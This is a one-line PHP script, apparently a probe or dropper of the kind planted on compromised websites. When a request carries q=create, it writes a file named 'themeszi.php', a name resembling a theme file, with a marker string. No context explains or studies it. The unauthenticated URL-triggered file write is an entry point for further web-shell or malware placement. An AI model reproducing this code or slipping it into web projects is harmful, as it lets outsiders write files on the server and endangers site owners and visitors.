<?php if (isset($_GET['q']) && $_GET['q']=='create') { if ($handle = fopen('themeszi.php', 'w')) {  fwrite($handle, '1234567890eeeee');  fclose($handle);}} ?>

